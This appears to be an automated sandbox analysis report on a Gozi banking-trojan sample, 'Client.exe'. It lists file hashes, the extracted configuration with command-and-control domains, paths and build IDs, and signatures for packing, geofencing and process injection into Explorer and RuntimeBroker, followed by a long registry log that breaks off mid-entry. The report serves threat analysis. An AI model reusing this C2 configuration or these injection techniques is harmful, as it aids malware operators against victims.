Analysis
-
max time kernel
150s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 09:07
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20230831-en
General
-
Target
Client.exe
-
Size
406KB
-
MD5
2f5a00394c3568e91f6302dc6c8b196c
-
SHA1
116f6ba99db4592f1ab5ccb1a734fdc5a52021bc
-
SHA256
3a1211935c4bd148eb6fb23c40d4806ee5a488b09bd61b3c0d15a47dbbfe64fd
-
SHA512
a30efa790e3ad7af4e574ef0bf359b6a91691947cf434ddcd30a228af29dea0a9b5c1daff050ecae6e88912e8f04813f1df9680e6fc896cee63e36476e4bbe36
-
SSDEEP
12288:l1HmKzwKhZhZsuyOtldw5hbu5Ty7pySxN1t:bHGKhZzLQ5Wn6H
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral2/memory/3660-0-0x0000000002F80000-0x0000000002F8C000-memory.dmp dave -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 2916 set thread context of 3188 2916 powershell.exe Explorer.EXE PID 3188 set thread context of 3804 3188 Explorer.EXE RuntimeBroker.exe PID 3188 set thread context of 4024 3188 Explorer.EXE RuntimeBroker.exe PID 3188 set thread context of 1912 3188 Explorer.EXE RuntimeBroker.exe PID 3188 set thread context of 4208 3188 Explorer.EXE RuntimeBroker.exe PID 3188 set thread context of 2684 3188 Explorer.EXE cmd.exe PID 3188 set thread context of 1684 3188 Explorer.EXE cmd.exe PID 2684 set thread context of 2160 2684 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f01855-0738-40c2-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000696cbdcd49fcd901696cbdcd49fcd901696cbdcd49fcd901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57396e2000313436316132613236636431303737336532336363636132386531363538316462306339353265366333343163383462353039356135656361323661656335640000b20009000400efbe4b57396e4b57396e2e0000000000000000000000000000000000000000000000000097e61300310034003600310061003200610032003600630064003100300037003700330065003200330063006300630061003200380065003100360035003800310064006200300063003900350032006500360063003300340031006300380034006200350030003900350061003500650063006100320036006100650063003500640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000315741351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31343631613261323663643130373733653233636363613238653136353831646230633935326536633334316338346235303935613565636132366165633564000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a1d8eddba9b53ee11941efeac1aa3586552d8063eedfcdf448a23f9f8aed1bb8a1d8eddba9b53ee11941efeac1aa35865ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\71e7fd97-cff7-43cf-b = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1418739b-869b-4dcf-9 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da34fe7b-022b-4fa4-a = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\004781d8cb06fab4562466f6cc7fc6ff379060aa8d3d8010a7d341a895f6ea5d" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ef383508-85d8-43b2-9 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95341f58-63c7-4a52-a = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d85eea722099415e25fef964ab910a7750643680f642e8314ed70660a19a0141" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f01855-0738-40c2-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7fb2b740-d302-4746-8 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11235a8e-ca14-4930-b = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001ff5c6cd49fcd9011ff5c6cd49fcd9011ff5c6cd49fcd901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57396e2000633230623035303064346437303366643439383933333831343739333963376364396666356662323362366461373563303030373265636637353831306234390000b20009000400efbe4b57396e4b57396e2e00000000000000000000000000000000000000000000000000e15d0a00630032003000620030003500300030006400340064003700300033006600640034003900380039003300330038003100340037003900330039006300370063006400390066006600350066006200320033006200360064006100370035006300300030003000370032006500630066003700350038003100300062003400390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000315741351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63323062303530306434643730336664343938393333383134373933396337636439666635666232336236646137356330303037326563663735383130623439000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a1e8eddba9b53ee11941efeac1aa3586552d8063eedfcdf448a23f9f8aed1bb8a1e8eddba9b53ee11941efeac1aa35865ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fb8126d2-276c-439d-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fcc73bce49fcd9017c942ccf49fcd9017c942ccf49fcd9010bff04000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57396e2000613663353439333666633730383963613636633536636234623832393264663861653237663535636630633163383138383034663965656633316333616534630000b20009000400efbe4b57396e4b57396e2e0000000000000000000000000000000000000000000000000091701d00610036006300350034003900330036006600630037003000380039006300610036003600630035003600630062003400620038003200390032006400660038006100650032003700660035003500630066003000630031006300380031003800380030003400660039006500650066003300310063003300610065003400630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000315741351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61366335343933366663373038396361363663353663623462383239326466386165323766353563663063316338313838303466396565663331633361653463000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a228eddba9b53ee11941efeac1aa3586552d8063eedfcdf448a23f9f8aed1bb8a228eddba9b53ee11941efeac1aa35865ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6dcaf763-0987-4d15-9 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3a096e6-1522-4213-b = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ef383508-85d8-43b2-9 = 48ab8bd149fcd901 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\71e7fd97-cff7-43cf-b RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3a096e6-1522-4213-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3a096e6-1522-4213-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f01855-0738-40c2-b = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95341f58-63c7-4a52-a = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1418739b-869b-4dcf-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1418739b-869b-4dcf-9 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\004781d8cb06fab4562466f6cc7fc6ff379060aa8d3d8010a7d341a895f6ea5d" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da34fe7b-022b-4fa4-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ef383508-85d8-43b2-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fb8126d2-276c-439d-a = 8c23ddd049fcd901 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11235a8e-ca14-4930-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f30d5ed8-f703-40a2-b = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a6c54936fc7089ca66c56cb4b8292df8ae27f55cf0c1c818804f9eef31c3ae4c" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7fb2b740-d302-4746-8 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fb8126d2-276c-439d-a RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f30d5ed8-f703-40a2-b = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11235a8e-ca14-4930-b = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f01855-0738-40c2-b = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\1461a2a26cd10773e23ccca28e16581db0c952e6c341c84b5095a5eca26aec5d" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7fb2b740-d302-4746-8 = 9c2123ce49fcd901 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7fb2b740-d302-4746-8 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f30d5ed8-f703-40a2-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f30d5ed8-f703-40a2-b = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006fe2b3cd49fcd9016fe2b3cd49fcd9016fe2b3cd49fcd901000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57396e2000613663353439333666633730383963613636633536636234623832393264663861653237663535636630633163383138383034663965656633316333616534630000b20009000400efbe4b57396e4b57396e2e0000000000000000000000000000000000000000000000000091701d00610036006300350034003900330036006600630037003000380039006300610036003600630035003600630062003400620038003200390032006400660038006100650032003700660035003500630066003000630031006300380031003800380030003400660039006500650066003300310063003300610065003400630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000315741351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61366335343933366663373038396361363663353663623462383239326466386165323766353563663063316338313838303466396565663331633361653463000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a1c8eddba9b53ee11941efeac1aa3586552d8063eedfcdf448a23f9f8aed1bb8a1c8eddba9b53ee11941efeac1aa35865ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da34fe7b-022b-4fa4-a RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3a096e6-1522-4213-b = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f01855-0738-40c2-b = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f30d5ed8-f703-40a2-b RuntimeBroker.exe Set value (str) 